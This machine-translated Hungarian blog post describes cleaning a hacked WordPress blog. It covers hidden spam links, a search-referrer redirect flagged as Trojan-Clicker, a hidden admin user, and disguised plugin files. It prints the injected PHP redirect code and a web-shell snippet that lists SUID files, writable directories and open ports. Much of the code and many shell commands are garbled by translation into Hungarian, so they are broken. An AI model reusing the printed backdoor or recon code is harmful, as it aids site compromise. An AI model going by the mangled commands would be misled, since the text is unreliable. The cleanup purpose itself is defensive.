Vírusos blogoszféra ... de mi volt velem?

Az elmúlt hónapban, kaptam figyelmeztetést vírus blog Egyes látogatók. Kezdetben figyelmen kívül hagyta a figyelmeztetéseket, mert telepített egy nagyon jó víruskereső (Kaspersky AV 2009), És bár a blog hosszú idő, én soha nem kaptam egy vírus figyelmeztetés (.. láttam valamit gyanús korábban, hogy az első frissítés eltűnt. Végül ...).
Lassan kezdtek megjelenni a nagy eltérések látogatói forgalmatEzt követően a forgalom az utóbbi időben folyamatosan csökken, és kezdett egyre több ember, akik azt mondják, hogy lopakodássettings.com van virused. Tegnap kaptam valakitől egy screenshot tenni, ha a víruskereső blokkolja a forgatókönyv lopakodástólsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ez elég meggyőző számomra, hogy az összes forrásból keresni. Az első gondolat, hogy jutott eszembe volt, hogy frissítés a legfrissebb WordPress (2.5.1), de csak a régi script hogy törölje az összes fájlt a WordPress és biztonsági adatbázis. Ez az eljárás nem működött, és valószínűleg hosszú időbe telt, mire rájöttem, hol van a hiba, ha nem árulta el. a vita egy kávé, talált A Google és jó lenne látni.
A MyDigitalLife.info cikket tett közzé: “WordPress Hack: Nyerje vissza és rögzítse a Google és a Search Engine or No Cookie forgalom irányítva a-Needs.info, AnyResults.Net, Golden-Info.net és más illegális oldalak"Ez a végén a menet volt szükségem.
Arról van szó, a kihasználni WordPress alapú süti, Ami szerintem nagyon bonyolult, és tette a könyvet. Okos elég ahhoz, hogy a SQL Injection Adatbázis a blog, hogy hozzon létre egy láthatatlan felhasználó egy egyszerű rutin ellenőrzés Műszerfal->felhasználók, ellenőrizze a szerver könyvtárakat és fájlokat "írható" (A chmod 777), hogy megkeresse és kivégez fájlok a kiváltságokat a root felhasználó vagy csoport. Nem tudom, akik kihasználják a nevét, és látom, hogy van néhány cikket írt róla, annak ellenére, hogy sok blogot fertőzött, köztük Románia. Ok ... Megpróbálom, hogy megpróbálja elmagyarázni általánosságokat a vírus.

Mi az a vírus?

Először helyezze a forrás oldalon a blogok, linkek láthatatlan a látogatók, de látható és váltólapkás keresők, főleg a Google. Ily módon a át Page Rank az oldalak által megadott támadó. Másodszor egy másik kerül beillesztésre átirányítás kód URL látogató érkezik a Google, Live, Yahoo, ... vagy egy RSS-olvasót, és nem a helyszínen aprósütemény. egy víruskereső érzékeli a átirányítására Trojan-Clicker.HTML.

Tünetek:

Masszív visszaesés látogatói forgalmat, Különösen a blogok, ahol a legtöbb látogató a Google-tól.

Azonosítás: (Így lett probléma azok számára, akik nem tudják, hogyan, hogyan kell phpmyadmin, php és linux)

LA. FIGYELEM! Először egy biztonsági másolat adatbázisban!

1. Ellenőrizze a forrás fájlokat index.php, header.php, footer.php, A blog témája és nézd meg, van egy kód, amely titkosítást használ base64 vagy az „if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”formátumot tartalmazza:


$ Seref = array ("Google", "msn", "élő", "AltaVista"
"Ask", "Yahoo", "AOL", "CNN", "időjárás", "Alexa");
$ Ser = 0, foreach ($ Seref as $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']) $ ref)! == False) {$ ser = "1?, Break;}
if ($ ser == ”1? && sizeof ($ _ COOKIE) == 0) {fejléc (” Hely: http: // ”.base64_decode (” YW55cmVzdWx0cy5uZXQ = ”).” / ”); kijárat;
}?>

... Vagy valami. Törölje ezt a kódot!

Kattints a képre ...

index kód

A fenti képernyőképen véletlenül kiválasztottam és " ". Ennek a kódnak meg kell maradnia.

2. Használat phpMyAdmin és megy az adatbázis tábla wp_usersAhol ellenőrizze, nincs felhasználónév létrehozott 00:00:00 0000-00-00 (Lehetséges elhelyezése user_login írni "WordPress". Írja ezt a felhasználói azonosítót (field ID), majd törölje azt.

Kattints a képre ...

hamis felhasználói

* A zöld vonal el kell távolítani, és a visszatartott az igazolványát. Abban az esetben, Vajon ID = 8 .

3. Menj a táblázat wp_usermeta, Hol található és törlés vonalak azonosító (ahol a terület user_id ID érték megjelenik törlése).

4. Táblázat wp_option, Ugrás active_plugins és mi bővítmény engedélyezve van gyanúsított. Ezt fel lehet használni, mint a vég _old.giff, _old.pngg, _old.jpeg, _new.php.giffstb. gazdag képkiterjesztések kombinációi a _old és _new.

KIVÁLASZTÁS * FROM wp_options WHERE option_name = 'active_plugins'

Törölje ezt a bővítményt, majd lépjen a blog -> Irányítópult -> Bővítmények oldalra, ahol deaktiválja és aktiválja az összes bővítményt.

Kattints a képre, hogy úgy tűnik, active_plugins vírus fájlt.

csatlakoztat

Kövesd az utat az FTP vagy SSH, megjelölt active_plugins és törölje a fájlt a szerverről.

5. Minden phpMyAdmin, táblázat wp_option, Keresse meg és törölje a sort tartalmazza: "rss_f541b3abd05e7962fcab37737f40fad8"És az"internal_links_cache ".
A internal_links_cache készült titkosított spam linkek jelennek meg a blog, és a Google Adsense kód, A hacker.

6. Javasoljuk, hogy jelszó megváltoztatása Blog és bejelentkezés távolítsa el az összes gyanús userele. Frissítés a legújabb verzióra a WordPress és állítsa be a blog, hogy ne engedélyezze az új felhasználók. Nincs veszteség ... nem tud nyilatkozni, és logikátlan.

A fentiekben megpróbáltam elmagyarázni egy kicsit, mit kell tennie ilyen helyzetben, hogy megtisztítsam a blogot ettől a vírustól. A probléma sokkal súlyosabb, mint amilyennek látszik, és még közel sem megoldott, mert használják őket biztonsági réseket A webszerver hosting, ami a blog.

Ennek első fokú biztonság, hozzáférési SSH, Hogy néhány ellenőrzést a szerveren, hogy ha azokat a fájlokat, mint a * _old * és * _new. * A befejezés.Giff,. jpeg,. pngg,. jpgg. Ezeket a fájlokat törölni kell. Ha átnevezi a fájlt, például. top_right_old.giff in top_right_old.phpLátjuk, hogy a fájl pontosan exploit kódot szervert.

Néhány hasznos utasítás a szerver ellenőrzéséhez, tisztításához és biztonságához. (SSH-n keresztül)

1.  cd / tmp és ellenőrizze, hogy vannak mappák, mint a tmpVFlma vagy más kombinációk is ugyanaz a neve, és törölje azt. Lásd a lenti képen, két ilyen mappák tőlem:

tmpserver

rm-rf foldername

2. Ellenőrizze elimiati (chmod változás) a lehető mappák attribútumok chmod 777

talál minden írható files jelenlegi dir: Keresés. -Type f-perm-2-ls
megtalálni az összes írható könyvtárak a jelenlegi konyvtarban: Keresés. -Type d-perm-2-ls
megtalálja az összes írható könyvtárat és files jelenlegi dir: Keresés. -Perm-2-ls

3. Keresi a gyanús fájlokat a kiszolgálón.

megtalálja. -nev “* _new.php *”
megtalálja. -nev “* _old.php *”
megtalálja. -nev “* .jpgg”
megtalálja. -nev “* _giff”
megtalálja. -nev “* _pngg”

4, FIGYELEM! A fájlok állították bit SUID si SGID. Ezek a fájlok végre a felhasználó jogosultságával (csoport) vagy gyökér, sem a felhasználó, aki végrehajtja a fájlt. Ezek a fájlok vezethet gyökér kompromisszum, ha biztonsági kérdéseket. Ha a fájlok SUID és SGID bit, végre "chmod 0 " be vagy távolítsa el a csomagot tartalmazó.

Exploit tartalmazza valahol a forrás ...:

if ($ safe_mode) {
if ($ os_type == 'nix') {
$ os. = végrehajtani ('sysctl -n kern.ostype');
$ os. = végrehajtani ('sysctl -n kern.osrelease');
$ os. = execute ('sysctl -n kernel.ostype');
$ os. = végrehajtani ('sysctl -n kernel.osrelease');
if (üres ($ user)) $ user = execute ('id');
$ Nevek = array (
"=>",
'találd meg files '=>' find / -típus f -perm -04000 -ls ',
'find sgid files '=>' find / -típus f -perm -02000 -ls ',
'mind írhatónak talál files az aktuális dir '=>' keresésben. -type f -perm -2 -ls ',
'az összes írható könyvtár megtalálása az aktuális könyvtárban' => 'find. -d típusú d -perm -2 -ls ',
'megtalálja az összes írható könyvtárat és files az aktuális dir '=>' keresésben. -perm -2 -ls ',
'show open ports' => 'netstat -an | grep -hallgatok ',
);
} Else {
$ os_name. = végrehajtani ('view');
$ user. = execute ('echo% username%');
$ Nevek = array (
"=>",
'show runing services' => 'nettó kezdet',
'show process list' => 'feladatlista'
);
}

Ily módon ... alapvetően találja megsértése a biztonság. Ports nyitott könyvtárak "írható" és csoportos végrehajtás kiváltságokat fájlok / root.

Vissza több ...

Egyes blogok fertőzött: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... A lista folytatódik ... sokat.

A Google keresőmotorjával ellenőrizheti, hogy egy blog fertőzött-e. másolás beillesztés:

oldal www.blegoo.com vásárolni

Jó éjszakát, és több munkát ;) Nemsokára jön fel a frissítésekről Eugen on prevezibil.imprevizibil.com.

BRB :)

TO: FIGYELEM! Változó WordPress téma vagy frissítés WordPress 2.5.1, nem megoldás, hogy megszabaduljon a vírus.

Vírusos blogoszféra ... de mi volt velem?

A szerzőről

Lopakodás

Szenvedélyesen minden eszközzel és informatikával kapcsolatban örömmel írok a lopakodásrólsettings.com 2006 óta, és szeretnék új dolgokat felfedezni veletek a számítógépekkel és az operációs rendszerekkel kapcsolatban a macOS, a Linux, Windows, iOS és Android.

Írj hozzászólást